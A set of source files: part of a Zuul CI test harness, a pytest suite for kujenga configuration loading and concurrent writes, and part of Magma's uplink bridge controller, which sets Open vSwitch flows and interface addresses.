self.smtp_messages = []
def FakeSMTPFactory(*args, **kw):
args = [self.smtp_messages] + list(args)
return FakeSMTP(*args, **kw)
self.useFixture(fixtures.MonkeyPatch('smtplib.SMTP', FakeSMTPFactory))
# Set a changes database so multiple FakeGerrit's can report back to
# a virtual canonical database given by the configured hostname
self.gerrit_changes_dbs = {}
self.gerrit_queues_dbs = {}
self.connections = {}
for section_name in self.config.sections():
con_match = re.match(r'^connection ([\'\"]?)(.*)(\1)$',
section_name, re.I)
if not con_match:
continue
con_name = con_match.group(2)
con_config = dict(self.config.items(section_name))
if 'driver' not in con_config:
raise Exception("No driver specified for connection %s."
% con_name)
con_driver = con_config['driver']
# TODO(jhesketh): load the required class automatically
if con_driver == 'gerrit':
if con_config['server'] not in self.gerrit_changes_dbs.keys():
self.gerrit_changes_dbs[con_config['server']] = {}
if con_config['server'] not in self.gerrit_queues_dbs.keys():
self.gerrit_queues_dbs[con_config['server']] = \
Queue.Queue()
self.event_queues.append(
self.gerrit_queues_dbs[con_config['server']])
self.connections[con_name] = FakeGerritConnection(
con_name, con_config,
changes_db=self.gerrit_changes_dbs[con_config['server']],
queues_db=self.gerrit_queues_dbs[con_config['server']],
upstream_root=self.upstream_root
)
setattr(self, 'fake_' + con_name, self.connections[con_name])
elif con_driver == 'smtp':
self.connections[con_name] = \
zuul.connection.smtp.SMTPConnection(con_name, con_config)
elif con_driver == 'sql':
self.connections[con_name] = \
zuul.connection.sql.SQLConnection(con_name, con_config)
else:
raise Exception("Unknown driver, %s, for connection %s"
% (con_config['driver'], con_name))
# If the [gerrit] or [smtp] sections still exist, load them in as a
# connection named 'gerrit' or 'smtp' respectively
if 'gerrit' in self.config.sections():
self.gerrit_changes_dbs['gerrit'] = {}
self.gerrit_queues_dbs['gerrit'] = Queue.Queue()
self.event_queues.append(self.gerrit_queues_dbs['gerrit'])
self.connections['gerrit'] = FakeGerritConnection(
'_legacy_gerrit', dict(self.config.items('gerrit')),
changes_db=self.gerrit_changes_dbs['gerrit'],
queues_db=self.gerrit_queues_dbs['gerrit'])
if 'smtp' in self.config.sections():
self.connections['smtp'] = \
zuul.connection.smtp.SMTPConnection(
'_legacy_smtp', dict(self.config.items('smtp')))
def setup_config(self, config_file='zuul.conf'):
"""Per test config object. Override to set different config."""
self.config = ConfigParser.ConfigParser()
self.config.read(os.path.join(FIXTURE_DIR, config_file))
def assertFinalState(self):
# Make sure that git.Repo objects have been garbage collected.
repos = []
gc.collect()
for obj in gc.get_objects():
if isinstance(obj, git.Repo):
repos.append(obj)
self.assertEqual(len(repos), 0)
self.assertEmptyQueues()
for pipeline in self.sched.layout.pipelines.values():
if isinstance(pipeline.manager,
zuul.scheduler.IndependentPipelineManager):
self.assertEqual(len(pipeline.queues), 0)
def shutdown(self):
self.log.debug("Shutting down after tests")
self.launcher.stop()
self.merge_server.stop()
self.merge_server.join()
self.merge_client.stop()
self.worker.shutdown()
self.sched.stop()
self.sched.join()
self.statsd.stop()
self.statsd.join()
self.webapp.stop()
self.webapp.join()
self.rpc.stop()
self.rpc.join()
self.gearman_server.shutdown()
threads = threading.enumerate()
if len(threads) > 1:
self.log.error("More than one thread is running: %s" % threads)
def init_repo(self, project):
parts = project.split('/')
path = os.path.join(self.upstream_root, *parts[:-1])
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(self.upstream_root, project)
repo = git.Repo.init(path)
repo.config_writer().set_value('user', 'email', 'user@example.com')
repo.config_writer().set_value('user', 'name', 'User Name')
repo.config_writer().write()
fn = os.path.join(path, 'README')
f = open(fn, 'w')
f.write("test\n")
f.close()
repo.index.add([fn])
repo.index.commit('initial commit')
master = repo.create_head('master')
repo.create_tag('init')
repo.head.reference = master
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
self.create_branch(project, 'mp')
def create_branch(self, project, branch):
path = os.path.join(self.upstream_root, project)
repo = git.Repo.init(path)
fn = os.path.join(path, 'README')
branch_head = repo.create_head(branch)
repo.head.reference = branch_head
f = open(fn, 'a')
f.write("test %s\n" % branch)
f.close()
repo.index.add([fn])
repo.index.commit('%s commit' % branch)
repo.head.reference = repo.heads['master']
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
def create_commit(self, project):
path = os.path.join(self.upstream_root, project)
repo = git.Repo(path)
repo.head.reference = repo.heads['master']
file_name = os.path.join(path, 'README')
with open(file_name, 'a') as f:
f.write('creating fake commit\n')
repo.index.add([file_name])
commit = repo.index.commit('Creating a fake commit')
return commit.hexsha
def ref_has_change(self, ref, change):
path = os.path.join(self.git_root, change.project)
repo = git.Repo(path)
try:
for commit in repo.iter_commits(ref):
if commit.message.strip() == ('%s-1' % change.subject):
return True
except GitCommandError:
pass
return False
def job_has_changes(self, *args):
job = args[0]
commits = args[1:]
if isinstance(job, FakeBuild):
parameters = job.parameters
else:
parameters = json.loads(job.arguments)
project = parameters['ZUUL_PROJECT']
path = os.path.join(self.git_root, project)
repo = git.Repo(path)
ref = parameters['ZUUL_REF']
sha = parameters['ZUUL_COMMIT']
repo_messages = [c.message.strip() for c in repo.iter_commits(ref)]
repo_shas = [c.hexsha for c in repo.iter_commits(ref)]
commit_messages = ['%s-1' % commit.subject for commit in commits]
self.log.debug("Checking if job %s has changes; commit_messages %s;"
" repo_messages %s; sha %s" % (job, commit_messages,
repo_messages, sha))
for msg in commit_messages:
if msg not in repo_messages:
self.log.debug(" messages do not match")
return False
if repo_shas[0] != sha:
self.log.debug(" sha does not match")
return False
self.log.debug(" OK")
return True
def registerJobs(self):
count = 0
for job in self.sched.layout.jobs.keys():
self.worker.registerFunction('build:' + job)
count += 1
self.worker.registerFunction('stop:' + self.worker.worker_id)
count += 1
while len(self.gearman_server.functions) < count:
time.sleep(0)
def orderedRelease(self):
# Run one build at a time to ensure non-race order:
while len(self.builds):
self.release(self.builds[0])
self.waitUntilSettled()
def release(self, job):
if isinstance(job, FakeBuild):
job.release()
else:
job.waiting = False
self.log.debug("Queued job %s released" % job.unique)
self.gearman_server.wakeConnections()
def getParameter(self, job, name):
if isinstance(job, FakeBuild):
return job.parameters[name]
else:
parameters = json.loads(job.arguments)
return parameters[name]
def resetGearmanServer(self):
self.worker.setFunctions([])
while True:
done = True
for connection in self.gearman_server.active_connections:
if (connection.functions and
connection.client_id not in ['Zuul RPC Listener',
'Zuul Merger']):
done = False
if done:
break
time.sleep(0)
self.gearman_server.functions = set()
self.rpc.register()
self.merge_server.register()
def haveAllBuildsReported(self):
# See if Zuul is waiting on a meta job to complete
if self.launcher.meta_jobs:
return False
# Find out if every build that the worker has completed has been
# reported back to Zuul. If it hasn't then that means a Gearman
# event is still in transit and the system is not stable.
for build in self.worker.build_history:
zbuild = self.launcher.builds.get(build.uuid)
if not zbuild:
# It has already been reported
continue
# It hasn't been reported yet.
return False
# Make sure that none of the worker connections are in GRAB_WAIT
for connection in self.worker.active_connections:
if connection.state == 'GRAB_WAIT':
return False
return True
def areAllBuildsWaiting(self):
builds = self.launcher.builds.values()
for build in builds:
client_job = None
for conn in self.launcher.gearman.active_connections:
for j in conn.related_jobs.values():
if j.unique == build.uuid:
client_job = j
break
if not client_job:
self.log.debug("%s is not known to the gearman client" %
build)
return False
if not client_job.handle:
self.log.debug("%s has no handle" % client_job)
return False
server_job = self.gearman_server.jobs.get(client_job.handle)
if not server_job:
self.log.debug("%s is not known to the gearman server" %
client_job)
return False
if not hasattr(server_job, 'waiting'):
self.log.debug("%s is being enqueued" % server_job)
return False
if server_job.waiting:
continue
worker_job = self.worker.gearman_jobs.get(server_job.unique)
if worker_job:
if build.number is None:
self.log.debug("%s has not reported start" % worker_job)
return False
if worker_job.build.isWaiting():
continue
else:
self.log.debug("%s is running" % worker_job)
return False
else:
self.log.debug("%s is unassigned" % server_job)
return False
return True
def eventQueuesEmpty(self):
for queue in self.event_queues:
yield queue.empty()
def eventQueuesJoin(self):
for queue in self.event_queues:
queue.join()
def waitUntilSettled(self):
self.log.debug("Waiting until settled...")
start = time.time()
while True:
if time.time() - start > 10:
self.log.debug("Queue status:")
for queue in self.event_queues:
self.log.debug(" %s: %s" % (queue, queue.empty()))
self.log.debug("All builds waiting: %s" %
(self.areAllBuildsWaiting(),))
raise Exception("Timeout waiting for Zuul to settle")
# Make sure no new events show up while we're checking
self.worker.lock.acquire()
# have all build states propagated to zuul?
if self.haveAllBuildsReported():
# Join ensures that the queue is empty _and_ events have been
# processed
self.eventQueuesJoin()
self.sched.run_handler_lock.acquire()
if (not self.merge_client.build_sets and
all(self.eventQueuesEmpty()) and
self.haveAllBuildsReported() and
self.areAllBuildsWaiting()):
self.sched.run_handler_lock.release()
self.worker.lock.release()
self.log.debug("...settled.")
return
self.sched.run_handler_lock.release()
self.worker.lock.release()
self.sched.wake_event.wait(0.1)
def countJobResults(self, jobs, result):
jobs = [x for x in jobs if x.result == result]
return len(jobs)
def getJobFromHistory(self, name):
history = self.worker.build_history
for job in history:
if job.name == name:
return job
raise Exception("Unable to find job %s in history" % name)
def assertEmptyQueues(self):
# Make sure there are no orphaned jobs
for pipeline in self.sched.layout.pipelines.values():
for queue in pipeline.queues:
if len(queue.queue) != 0:
print('pipeline %s queue %s contents %s' % (
pipeline.name, queue.name, queue.queue))
self.assertEqual(len(queue.queue), 0,
"Pipelines queues should be empty")
def assertReportedStat(self, key, value=None, kind=None):
start = time.time()
while time.time() < (start + 5):
for stat in self.statsd.stats:
pprint.pprint(self.statsd.stats)
k, v = stat.split(':')
if key == k:
if value is None and kind is None:
return
elif value:
if value == v:
return
elif kind:
if v.endswith('|' + kind):
return
time.sleep(0.1)
pprint.pprint(self.statsd.stats)
raise Exception("Key %s not found in reported stats" % key)
class ZuulDBTestCase(ZuulTestCase):
def setup_config(self, config_file='zuul-connections-same-gerrit.conf'):
super(ZuulDBTestCase, self).setup_config(config_file)
for section_name in self.config.sections():
con_match = re.match(r'^connection ([\'\"]?)(.*)(\1)$',
section_name, re.I)
if not con_match:
continue
if self.config.get(section_name, 'driver') == 'sql':
f = MySQLSchemaFixture()
self.useFixture(f)
if (self.config.get(section_name, 'dburi') ==
'$MYSQL_FIXTURE_DBURI$'):
self.config.set(section_name, 'dburi', f.dburi)
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from kujenga.util.config import create_default_kujenga_config, initial_config_file, load_config, save_config
from kujenga.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_kujenga_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_kujenga_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_kujenga_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_kujenga_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_kujenga_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55324
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written as a whole.
"""
# Artificially inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
uplink_bridge.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import subprocess
import threading
from collections import namedtuple
import netaddr
import netifaces
from magma.pipelined.app.base import ControllerType, MagmaController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow import flows
class UplinkBridgeController(MagmaController):
"""
This controller manages uplink bridge flows
These flows are used in Non NAT configuration.
"""
APP_NAME = "uplink_bridge"
APP_TYPE = ControllerType.SPECIAL
UPLINK_DHCP_PORT_NAME = 'dhcp0'
UPLINK_PATCH_PORT_NAME = 'patch-agw'
UPLINK_OVS_BRIDGE_NAME = 'uplink_br0'
DEFAULT_UPLINK_PORT_NAME = 'eth3'
DEFAULT_UPLINK_MAC = '11:22:33:44:55:66'
DEFAULT_DEV_VLAN_IN = 'vlan_pop_in'
DEFAULT_DEV_VLAN_OUT = 'vlan_pop_out'
UplinkConfig = namedtuple(
'UplinkBridgeConfig',
['uplink_bridge', 'uplink_eth_port_name', 'uplink_patch',
'enable_nat', 'virtual_mac', 'dhcp_port',
'sgi_management_iface_vlan', 'sgi_management_iface_ip_addr',
'dev_vlan_in', 'dev_vlan_out', 'ovs_vlan_workaround',
'sgi_management_iface_gw'],
)
def __init__(self, *args, **kwargs):
super(UplinkBridgeController, self).__init__(*args, **kwargs)
self.config = self._get_config(kwargs['config'])
self.logger.info("uplink bridge app config: %s", self.config)
def _get_config(self, config_dict) -> namedtuple:
enable_nat = config_dict.get('enable_nat', True)
bridge_name = config_dict.get('uplink_bridge',
self.UPLINK_OVS_BRIDGE_NAME)
dhcp_port = config_dict.get('uplink_dhcp_port',
self.UPLINK_DHCP_PORT_NAME)
uplink_patch = config_dict.get('uplink_patch',
self.UPLINK_PATCH_PORT_NAME)
uplink_eth_port_name = config_dict.get('uplink_eth_port_name',
self.DEFAULT_UPLINK_PORT_NAME)
if uplink_eth_port_name not in netifaces.interfaces():
uplink_eth_port_name = None
virtual_mac = config_dict.get('virtual_mac',
self.DEFAULT_UPLINK_MAC)
sgi_management_iface_vlan = config_dict.get('sgi_management_iface_vlan', "")
sgi_management_iface_ip_addr = config_dict.get('sgi_management_iface_ip_addr', "")
dev_vlan_in = config_dict.get('dev_vlan_in', self.DEFAULT_DEV_VLAN_IN)
dev_vlan_out = config_dict.get('dev_vlan_out', self.DEFAULT_DEV_VLAN_OUT)
ovs_vlan_workaround = config_dict.get('ovs_vlan_workaround', True)
sgi_management_iface_gw = config_dict.get('sgi_management_iface_gw', "")
return self.UplinkConfig(
enable_nat=enable_nat,
uplink_bridge=bridge_name,
uplink_eth_port_name=uplink_eth_port_name,
virtual_mac=virtual_mac,
uplink_patch=uplink_patch,
dhcp_port=dhcp_port,
sgi_management_iface_vlan=sgi_management_iface_vlan,
sgi_management_iface_ip_addr=sgi_management_iface_ip_addr,
dev_vlan_in=dev_vlan_in,
dev_vlan_out=dev_vlan_out,
ovs_vlan_workaround=ovs_vlan_workaround,
sgi_management_iface_gw=sgi_management_iface_gw
)
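# Illustrative config snippet covering the keys read above (values are
# examples only, not defaults defined by this controller):
#   enable_nat: false
#   uplink_bridge: uplink_br0
#   uplink_eth_port_name: eth3
#   sgi_management_iface_vlan: "100"
#   sgi_management_iface_ip_addr: 10.0.2.1/24
#   ovs_vlan_workaround: true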
def initialize_on_connect(self, datapath):
if self.config.enable_nat is True:
self._delete_all_flows()
self._del_eth_port()
return
self._delete_all_flows()
self._add_eth_port()
self._setup_vlan_pop_dev()
# flows to forward traffic between the patch port and the eth port
# 1. Setup SGi management iface flows
if self.config.sgi_management_iface_vlan:
# 1.a. Ingress
match = "in_port=%s,vlan_vid=%s/0x1fff" % (self.config.uplink_eth_port_name,
hex(0x1000 | int(self.config.sgi_management_iface_vlan)))
actions = "strip_vlan,output:LOCAL"
self._install_flow(flows.MAXIMUM_PRIORITY, match, actions)
# 1.b. Egress
match = "in_port=LOCAL"
actions = "push_vlan:0x8100,mod_vlan_vid=%s,output:%s" % (self.config.sgi_management_iface_vlan,
self.config.uplink_eth_port_name)
self._install_flow(flows.MAXIMUM_PRIORITY, match, actions)
else:
# 1.a. Ingress
match = "in_port=%s,ip" % self.config.uplink_eth_port_name
actions = "output:LOCAL"
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# 1.b. Egress
match = "in_port=LOCAL"
actions = "output:%s" % self.config.uplink_eth_port_name
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# 2.a. DHCP Req traffic
match = "in_port=%s,ip,udp,tp_dst=68" % self.config.uplink_eth_port_name
actions = "output:%s,output:LOCAL" % self.config.dhcp_port
self._install_flow(flows.MAXIMUM_PRIORITY - 1, match, actions)
# 2.b DHCP reply flows
match = "in_port=%s" % self.config.dhcp_port
actions = "output:%s" % self.config.uplink_eth_port_name
self._install_flow(flows.MAXIMUM_PRIORITY - 1, match, actions)
# 3. UE egress traffic
match = "in_port=%s" % self.config.uplink_patch
actions = "mod_dl_src=%s, output:%s" % (self.config.virtual_mac,
self.config.uplink_eth_port_name)
self._install_flow(flows.MEDIUM_PRIORITY, match, actions)
if self.config.ovs_vlan_workaround:
# 4.a. All ingress IP traffic for UE mac
match = "in_port=%s,dl_dst=%s, vlan_tci=0x0000/0x1000" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
match = "in_port=%s,dl_dst=%s, vlan_tci=0x1000/0x1000" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "strip_vlan,output:%s" % self.config.dev_vlan_in
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
# 4.b. redirect all vlan-out traffic to patch port
match = "in_port=%s,dl_dst=%s" % \
(self.config.dev_vlan_out,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
else:
# 4.a. All ingress IP traffic for UE mac
match = "in_port=%s, dl_dst=%s" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
# 5. Handle ARP from eth0
match = "in_port=%s,arp" % self.config.uplink_eth_port_name
actions = "output:%s,output:%s,output:LOCAL" % (self.config.dhcp_port,
self.config.uplink_patch)
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# everything else:
self._kill_dhclient(self.config.uplink_eth_port_name)
self._set_sgi_ip_addr(self.config.uplink_bridge)
self._set_sgi_gw(self.config.uplink_bridge)
self._set_arp_ignore('all', '1')
def cleanup_on_disconnect(self, datapath):
self._del_eth_port()
self._delete_all_flows()
def delete_all_flows(self, datapath):
self._delete_all_flows()
def _delete_all_flows(self):
if self.config.uplink_bridge is None:
return
del_flows = "ovs-ofctl del-flows %s" % self.config.uplink_bridge
self.logger.info("Delete all flows: %s", del_flows)
try:
subprocess.Popen(del_flows, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (del_flows, ex))
def _install_flow(self, priority: int, flow_match: str, flow_action: str):
if self.config.enable_nat is True:
return
flow_cmd = "ovs-ofctl add-flow -Oopenflow13 %s \"priority=%s,%s, actions=%s\"" % (
self.config.uplink_bridge, priority,
flow_match, flow_action)
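# A generated command looks like this (illustrative values):
#   ovs-ofctl add-flow -Oopenflow13 uplink_br0 "priority=100,in_port=LOCAL, actions=output:eth3"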
self.logger.info("Create flow %s", flow_cmd)
try:
subprocess.Popen(flow_cmd, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (flow_cmd, ex))
def _install_ip_v4_v6_flows(self, priority: int, flow_match: str, flow_action: str):
if self.config.enable_nat is True:
return
self._install_flow(priority, flow_match + ", ip", flow_action)
self._install_flow(priority, flow_match + ", ipv6", flow_action)
def _add_eth_port(self):
if self.config.enable_nat is True or \
self.config.uplink_eth_port_name is None:
return
if BridgeTools.port_is_in_bridge(self.config.uplink_bridge,
self.config.uplink_eth_port_name):
return
self._cleanup_if(self.config.uplink_eth_port_name, True)
# Add eth interface to OVS.
ovs_add_port = "ovs-vsctl --may-exist add-port %s %s" \
% (self.config.uplink_bridge, self.config.uplink_eth_port_name)
try:
subprocess.Popen(ovs_add_port, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (ovs_add_port, ex))
self.logger.info("Add uplink port: %s", ovs_add_port)
def _del_eth_port(self):
if BridgeTools.port_is_in_bridge(self.config.uplink_bridge,
self.config.uplink_eth_port_name):
self._cleanup_if(self.config.uplink_bridge, True)
if self.config.uplink_eth_port_name is None:
return
ovs_rem_port = "ovs-vsctl --if-exists del-port %s %s" \
% (self.config.uplink_bridge, self.config.uplink_eth_port_name)
try:
subprocess.Popen(ovs_rem_port, shell=True).wait()
self.logger.info("Remove ovs uplink port: %s", ovs_rem_port)
except subprocess.CalledProcessError as ex:
self.logger.debug("ignore port del error: %s ", ex)
return
if self.config.uplink_eth_port_name:
self._set_sgi_ip_addr(self.config.uplink_eth_port_name)
self._set_sgi_gw(self.config.uplink_eth_port_name)
def _set_sgi_gw(self, if_name: str):
self.logger.debug('self.config.sgi_management_iface_gw %s',
self.config.sgi_management_iface_gw)
if self.config.sgi_management_iface_gw is None or \
self.config.sgi_management_iface_gw == "":
return
try:
set_gw_command = ["ip",
"route", "replace", "default", "via",
self.config.sgi_management_iface_gw,
"metric", "100", "dev",
if_name]
subprocess.check_call(set_gw_command)
self.logger.debug("SGi GW config: [%s]", set_gw_command)
except subprocess.SubprocessError as e:
self.logger.warning("Error while setting SGi GW: %s", e)
def _set_sgi_ip_addr(self, if_name: str):
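        # With no static SGi address configured, fall back to DHCP on the
        # uplink bridge (or "ifup" for a system port); otherwise assign the
        # configured static address unless it is already present.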
self.logger.debug("self.config.sgi_management_iface_ip_addr %s",
self.config.sgi_management_iface_ip_addr)
if self.config.sgi_management_iface_ip_addr is None or \
self.config.sgi_management_iface_ip_addr == "":
if if_name == self.config.uplink_bridge:
self._restart_dhclient(if_name)
else:
if_addrs = netifaces.ifaddresses(if_name).get(netifaces.AF_INET, [])
if len(if_addrs) != 0:
self.logger.info("SGi has valid IP, skip reconfiguration %s", if_addrs)
return
# for system port, use networking config
try:
self._flush_ip(if_name)
except subprocess.CalledProcessError as ex:
self.logger.info("could not flush ip addr: %s, %s",
if_name, ex)
if_up_cmd = ["ifup", if_name, "--force"]
try:
subprocess.check_call(if_up_cmd)
except subprocess.CalledProcessError as ex:
self.logger.info("could not bring up if: %s, %s",
if_up_cmd, ex)
return
try:
self._kill_dhclient(if_name)
if self._is_iface_ip_set(if_name,
self.config.sgi_management_iface_ip_addr):
self.logger.info("ip addr %s already set for iface %s",
self.config.sgi_management_iface_ip_addr,
if_name)
return
self._flush_ip(if_name)
set_ip_cmd = ["ip",
"addr", "add",
self.config.sgi_management_iface_ip_addr,
"dev",
if_name]
subprocess.check_call(set_ip_cmd)
self.logger.debug("SGi ip address config: [%s]", set_ip_cmd)
except subprocess.SubprocessError as e:
self.logger.warning("Error while setting SGi IP: %s", e)
def _is_iface_ip_set(self, if_name, ip_addr):
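        # Return True if the given address/netmask matches any IPv4 address
        # currently assigned to the interface.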
ip_addr = netaddr.IPNetwork(ip_addr)
if_addrs = netifaces.ifaddresses(if_name).get(netifaces.AF_INET, [])
for addr in if_addrs:
addr = netaddr.IPNetwork("/".join((addr['addr'], addr['netmask'])))
if ip_addr == addr:
return True
return False
def _flush_ip(self, if_name):
flush_ip = ["ip", "addr", "flush", "dev", if_name]
subprocess.check_call(flush_ip)
def _kill_dhclient(self, if_name):
# Kill dhclient if running.
pgrep_out = subprocess.Popen(["pgrep", "-f", "dhclient.*" + if_name],
stdout=subprocess.PIPE)
for pid in pgrep_out.stdout.readlines():
subprocess.check_call(["kill", pid.strip()])
    def _restart_dhclient(self, if_name):
        # Restarting the DHCP client can take a long time; run it in a separate thread.
        threading.Thread(target=self._restart_dhclient_if, args=(if_name,)).start()
def _setup_vlan_pop_dev(self):
if self.config.ovs_vlan_workaround:
# Create device
BridgeTools.create_veth_pair(self.config.dev_vlan_in,
self.config.dev_vlan_out)
            # Add to OVS.
            # The requested OFP port numbers (70 and 71) are only for test
            # validation; they are not used anywhere else.
BridgeTools.add_ovs_port(self.config.uplink_bridge,
self.config.dev_vlan_in, "70")
BridgeTools.add_ovs_port(self.config.uplink_bridge,
self.config.dev_vlan_out, "71")
def _cleanup_if(self, if_name, flush: bool):
# Release eth IP first.
release_eth_ip = ["dhclient", "-r", if_name]
try:
subprocess.check_call(release_eth_ip)
except subprocess.CalledProcessError as ex:
self.logger.info("could not release dhcp lease: %s, %s",
release_eth_ip, ex)
if not flush:
return
try:
self._flush_ip(if_name)
except subprocess.CalledProcessError as ex:
